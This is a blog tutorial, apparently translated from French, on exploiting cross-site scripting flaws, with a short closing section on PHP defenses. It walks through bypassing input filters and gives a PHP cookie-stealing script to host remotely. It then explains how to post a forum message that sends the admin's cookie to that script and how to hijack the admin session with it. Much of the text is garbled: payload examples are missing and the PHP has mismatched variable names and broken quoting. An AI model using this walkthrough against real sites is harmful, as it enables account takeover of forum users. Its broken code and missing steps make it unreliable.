Last updated: July 16, 2022
In this post, I will tell you about the cross-site scripting flaw, abbreviated XSS. We will see together how to exploit this flaw and of course how to protect yourself from it.
Before starting, I must clarify one thing: many people are thinking that this flaw is useless. Well that's wrong. Believe me, the XSS flaw is dangerous, of course you will not be able to take control of a server with this flaw but it makes it easier for other types of attacks. You just have to know how to use it.
What is the XSS vulnerability?
La XSS flaw, originally CSS (Cross Site Scripting) changed so as not to confuse with CSS Cascading Style Sheets, is a type of website security vulnerability, found in poorly executed web applications. secure.
The principle of this flaw is to inject malicious code in JavaScript language into a vulnerable website. For example by posting a message in a forum which redirects the Internet user to a fake site (Phishing) or who steals their information (cookies).
La XSS flaw allows you to run scripts on the client side. This means that you can only run JAVASCRIPT, HTML and other languages which will only run at the person running the script and not on the server directly. I let your imagination give you ideas.
How to detect the presence of an XSS vulnerability?
The XSS are widespread on the web, more specifically in forums, web applications and search engines.
Detection of the presence of a XSS flaw can be done for example by entering a JavaScript script in a form field or in a URL:
If a dialog box appears, it can be concluded that the web application is susceptible to XSS attacks.
To fully understand the principle, nothing beats an example.
Assume the following code:
<?php if (isset($_GET[‘mot_recherche’]))
{
echo “You are looking for the following word: “.$_GET['searchword'];
}?>Search:
On a web browser this would give:
How to bypass XSS filters?
In reality, it doesn't always work that way. Web developers are aware of this attack, so they have developed methods to secure their web applications against this vulnerability. I can for example quote magic_quote_gpc.
In this part, I'll show you how to bypass some filters used by developers to secure web applications:
Magic_quotes_gpc filter
When the magic_quotes function is enabled, all characters ' (apostrophes), » (quotes), (backslashes) and NULL are replaced with a backslash. The “magic_quotes_gpc” function protects data sent by the “GET”, “POST” methods.
For example if I enter the following code in the search bar and click send:
He becomes:
So how to bypass this filter? Just use the javascript function called String.fromCharCode ().
This function will convert our text to decimal characters.
For this I will use Hackbar, a Firefox plugin.
Using "hack" (without quotes) will look like this:
Miracle it works!
Obfuscation Technique
This filter, for example, blocks the following words:
- script
- alert
Here if we put alert(‘Hack’) the site will give us as a message alert () because he will remove all the et .
To bypass this filter, we'll just switch par et alert par alealertrt
like this :
Once the banners are removed it gives us:
And it still works!
There is a Firefox plugin, XSS ME specializing in finding this type of vulnerability.
How to exploit an XSS vulnerability?
Okay so, as we have just seen, the flaws XSS run on the client side. So to trap a target we have to make the site administrator run our script himself. And after, we have to retrieve his cookie.
So to exploit the XSS flaw, we need a PHP script that will retrieve the value of the $ cookie variable and write it to a .txt file.
For that, create a file under the name xss.php and put the following code:
$cookie = $_GET['a']; // we recognize a as a GET variable
if($cookie)
{
$fp = fopen('cookies.txt','a'); // Open cookies.txt for editing
fputs($fp,$cook . 'rn');// We write the content of the cookie on a new line
fclose($fp); // We close the cookies.txt file
}?>
location.replace('http://www.google.fr);
// Redirect the target to google.fr so that it doesn't suspect anything
Save the xss.php file, then put it on an FTP server which supports PHP. Here our script is in place, it only remains to test it.
Imagine that by testing the techniques mentioned above on a forum, where you are a member, you detect the presence of an XSS vulnerability and you want to use the PHP script that we have created.
How to do ?
You simply post a message on the forum containing the following text:
By seeing the code, we understand perfectly that there is? A =, it is the variable $ _GET ['a'] of our code.
document.cookie represents the victim's cookie.
You have just retrieved the forum admin cookie, but what to do with it?
At this time, many people think that XSS vulnerabilities are not dangerous, but they are largely mistaken.
Once you have retrieved a cookie, you will be able to put in your folder with your cookies. Then restart your web browser and you will be able to access the admin session without needing a password.
Protect yourself from the XSS vulnerability
Several techniques allow you to protect yourself from the XSS flaw:
- The htmlspecialchars () function converts special characters to HTML entities.
- htmlentities() which is identical to htmlspecialchars() except that it filters all characters equivalent to html or javascript encoding.
- strip_tags (), this function removes all tags.
I hope you were able to learn something from this article, and understand the danger of the XSS flaw!
If not, think about sharing this post on Facebook or Twitter, that would make me really happy! 😉